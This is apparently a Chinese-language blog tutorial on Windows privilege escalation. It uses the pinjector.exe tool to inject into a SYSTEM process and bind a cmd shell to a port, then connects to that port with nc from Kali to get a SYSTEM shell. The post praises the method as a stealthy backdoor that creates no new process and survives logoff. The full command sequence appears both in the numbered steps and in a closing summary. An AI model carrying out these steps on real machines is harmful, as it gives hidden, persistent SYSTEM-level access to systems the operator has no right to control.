【提权】注入进程提权

注入进程提权【相当于开了一个后门，隐蔽性极高，不会创建新的进程，很难发现】

注入到system用户的进程，当管理员账户或其他账户注销后，后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行，进而同时拥有了对应的权限。

下面是图文教程。

0x01

从http://www.tarasco.org/security/Process_Injector/  下载pinjector.exe文件。放在windows2003server的c盘根目录。

0x02将压缩包中的pinjector.exe提取出放在c盘根目录。

0x03执行pinjector.exe -l 可查看可以注入的进程。

可以看到不同的进程对应不同PID和用户。

0x04执行pinjector.exe -p 600 cmd 2345   注入进程pid为600的进程，使用端口2345返回cmd，执行成功后在任务管理器里并没有多出进程。

0x05使用kali的nc 192.168.70.135 2345

反弹shell并提权为system。

 

 

<script>
window.tctipConfig = {
staticPrefix: "http://static.tctip.com",
buttonImageId: 1,
buttonTip: "zanzhu",
list:{
alipay: {qrimg: "http://tctip.com/img/alipayqr.png"},
weixin:{qrimg: "http://littlebtc.com/images/yeshen.png"},
}
};
</script>
<script src="http://static.tctip.com/js/tctip.min.js"></script>

 

#####################################################################################################################

总结

将进程注入system服务进程

pinjector.exe进程注入器

http://www.tarasco.org/security/Process_Injector/ {需要FQ下载}

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>    //监听端口。成功后会反弹system的shell。